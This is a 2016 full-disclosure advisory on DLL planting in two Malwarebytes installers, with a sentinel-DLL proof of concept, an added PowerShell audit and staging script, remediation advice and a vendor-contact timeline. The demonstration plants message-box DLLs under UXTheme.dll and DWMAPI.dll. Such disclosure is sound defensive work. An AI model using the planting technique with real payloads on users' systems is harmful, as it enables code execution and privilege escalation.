
Malwarebytes 2.2.0.1024 DLL Hijacking

Posted on 08 March 2016

Hi @ll,

Malwarebytes' executable installers mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe (available from <https://downloads.malwarebytes.org/file/mbam_current/> and <https://downloads.malwarebytes.org/file/mbae_current/>) load and execute UXTheme.dll and DWMAPI.dll from their "application directory", i.e. the directory the executable resides in, which Windows searches first when a DLL is loaded by name only.

For software downloaded with a web browser the application directory is typically the user's "Downloads" directory: see <https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>, <http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html> and <http://seclists.org/fulldisclosure/2012/Aug/134>

If an attacker places UXTheme.dll and/or DWMAPI.dll in the user's "Downloads" directory, for example per "drive-by download" or "social engineering", this vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executables, which specifies "requireAdministrator", the executable installers run with administrative privileges ("protected" administrators are prompted for consent, unprivileged standard users are prompted for an administrator's password); execution of the planted DLLs therefore results in an escalation of privilege!

Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit <http://home.arcor.de/skanthak/sentinel.html>, download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>, save it as UXTheme.dll in your "Downloads" directory, then copy it as DWMAPI.dll;

2. download mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe and save them in your "Downloads" directory;

3. execute mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!
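The following PowerShell script is an added example and not part of the original advisory or of Malwarebytes' code. It turns the four PoC steps above into something repeatable and adds the check a practitioner wants before running any downloaded installer: does the file carry a "requireAdministrator" manifest, and which DLLs sit beside it that the loader would really resolve from the application directory (names listed under KnownDLLs are mapped from the kernel's object directory and never searched on disk, so they cannot be planted this way). It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows; the sentinel DLL, the installer path and the C:\tools directory are placeholders you supply.

```powershell
# Added example (not from the advisory): audit an installer for the two ingredients
# of this bug class and stage sentinel DLLs the way the PoC does.
# Assumes Windows PowerShell 5.1 / PowerShell 7 on Windows; paths below are placeholders.

Add-Type -Namespace Win32 -Name Res -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern IntPtr LoadLibraryExW(string lpFileName, IntPtr hFile, uint dwFlags);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr FindResourceW(IntPtr hModule, IntPtr lpName, IntPtr lpType);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll")]
public static extern IntPtr LockResource(IntPtr hResData);
[DllImport("kernel32.dll")]
public static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool FreeLibrary(IntPtr hModule);
'@

function Get-EmbeddedManifest {
    # Returns the RT_MANIFEST resource (id 1) of a PE file as text, or $null if absent.
    # The image is mapped as a data file, so none of its code (and no DLL it would
    # pull in from its application directory) gets executed by this check.
    param([Parameter(Mandatory)][string]$Path)
    $full = (Resolve-Path -LiteralPath $Path).ProviderPath
    $h = [Win32.Res]::LoadLibraryExW($full, [IntPtr]::Zero, 0x22)  # LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE
    if ($h -eq [IntPtr]::Zero) { throw ("LoadLibraryEx failed: " + [ComponentModel.Win32Exception]::new().Message) }
    try {
        $res = [Win32.Res]::FindResourceW($h, [IntPtr]1, [IntPtr]24)  # MAKEINTRESOURCE(1), RT_MANIFEST = 24
        if ($res -eq [IntPtr]::Zero) { return $null }
        $size  = [int][Win32.Res]::SizeofResource($h, $res)
        $ptr   = [Win32.Res]::LockResource([Win32.Res]::LoadResource($h, $res))
        $bytes = New-Object byte[] $size
        [Runtime.InteropServices.Marshal]::Copy($ptr, $bytes, 0, $size)
        return [Text.Encoding]::UTF8.GetString($bytes)
    } finally {
        [void][Win32.Res]::FreeLibrary($h)
    }
}

function Test-InstallerPlanting {
    # Reports the installer's requestedExecutionLevel and every DLL beside it.
    # A DLL that is not a KnownDLL is resolved application directory first, which
    # is exactly the search-order property the advisory exploits.
    param([Parameter(Mandatory)][string]$Installer)
    $full  = (Resolve-Path -LiteralPath $Installer).ProviderPath
    $dir   = Split-Path -Parent $full
    $level = 'none found (asInvoker)'
    $m = Get-EmbeddedManifest -Path $full
    if ($m -and $m -match 'requestedExecutionLevel[^>]*\blevel\s*=\s*"([^"]+)"') { $level = $Matches[1] }

    $knownKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    $known = (Get-ItemProperty -LiteralPath $knownKey).PSObject.Properties |
             Where-Object { $_.Value -is [string] -and $_.Value -like '*.dll' } |
             ForEach-Object { $_.Value.ToLowerInvariant() }

    Get-ChildItem -LiteralPath $dir -Filter *.dll -File | ForEach-Object {
        $sig    = Get-AuthenticodeSignature -LiteralPath $_.FullName
        $signer = ''
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        [pscustomobject]@{
            Installer  = Split-Path -Leaf $full
            ExecLevel  = $level
            DllBeside  = $_.Name
            IsKnownDll = ($known -contains $_.Name.ToLowerInvariant())
            Signature  = $sig.Status
            Signer     = $signer
        }
    }
}

function Copy-SentinelDll {
    # PoC step 1: plant one copy of a sentinel DLL under each name the installer
    # loads from its application directory. The sentinel is yours (SENTINEL.DLL from
    # the link above, or any DLL that shows a message box from DllMain).
    param(
        [Parameter(Mandatory)][string]$Sentinel,
        [string]$TargetDir = (Join-Path $env:USERPROFILE 'Downloads'),
        [string[]]$Names = @('UXTheme.dll', 'DWMAPI.dll')
    )
    foreach ($n in $Names) {
        $dest = Join-Path $TargetDir $n
        Copy-Item -LiteralPath $Sentinel -Destination $dest -Force
        $dest
    }
}

# Usage (placeholder paths):
#   Copy-SentinelDll -Sentinel 'C:\tools\SENTINEL.DLL'
#   Test-InstallerPlanting -Installer "$env:USERPROFILE\Downloads\mbam-setup-2.2.0.1024.exe" | Format-Table -AutoSize
#   Start-Process -FilePath "$env:USERPROFILE\Downloads\mbam-setup-2.2.0.1024.exe" -Wait   # PoC step 3
```

Two caveats. A DLL lying beside an elevating installer is necessary but not sufficient: only the names the installer really loads from its application directory matter, which is what the sentinel run (or a Process Monitor trace of its CreateFile calls) establishes, and for these two installers the advisory names UXTheme.dll and DWMAPI.dll. And an executable with no manifest at all is not automatically safe, because UAC's installer-detection heuristic elevates unmanifested 32-bit programs whose names contain words such as "setup" or "install". Neither check can be fixed from the user's side; the remedy belongs in the installer, which must load system DLLs by fully qualified path or restrict the search order (SetDefaultDllDirectories / LoadLibraryEx with LOAD_LIBRARY_SEARCH_SYSTEM32) before touching them.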
See <http://seclists.org/fulldisclosure/2015/Nov/101>, <http://seclists.org/fulldisclosure/2015/Dec/86> and <http://seclists.org/fulldisclosure/2015/Dec/33> plus <http://home.arcor.de/skanthak/!execute.html> and <http://home.arcor.de/skanthak/sentinel.html> for details about this well-known and well-documented BEGINNER'S error!

regards
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's errors. It's a tell-tale sign to stay away from this snakeoil!

Timeline:
~~~~~~~~~

2015-12-25    sent report regarding MBAM to vendor
2015-12-25    automatic reply from vendor: "We have received your request and an agent will respond to your ticket in the order in which it was received."
2016-01-03    reply from vendor: "We'll take this into consideration for a near-future installer revamp."
2016-02-02    requested status update
              NO REPLY, not even an acknowledgement of receipt
2016-02-02    sent notice to Marcin Kleczynski after his public announcement of a bug bounty program
2016-02-02    reply from Marcin Kleczynski: "I'm copying Pedro Bustamante who organizes our bug bounty program to take a look."
              NO reply from Pedro Bustamante et al.
2016-02-12    sent report regarding MBAE to vendor
              NO REPLY, not even an acknowledgement of receipt
2016-02-22    resent report regarding MBAE to vendor
              NO REPLY, not even an acknowledgement of receipt
2016-03-06    report published in accordance with my disclosure policy <http://home.arcor.de/skanthak/policy.html>

 
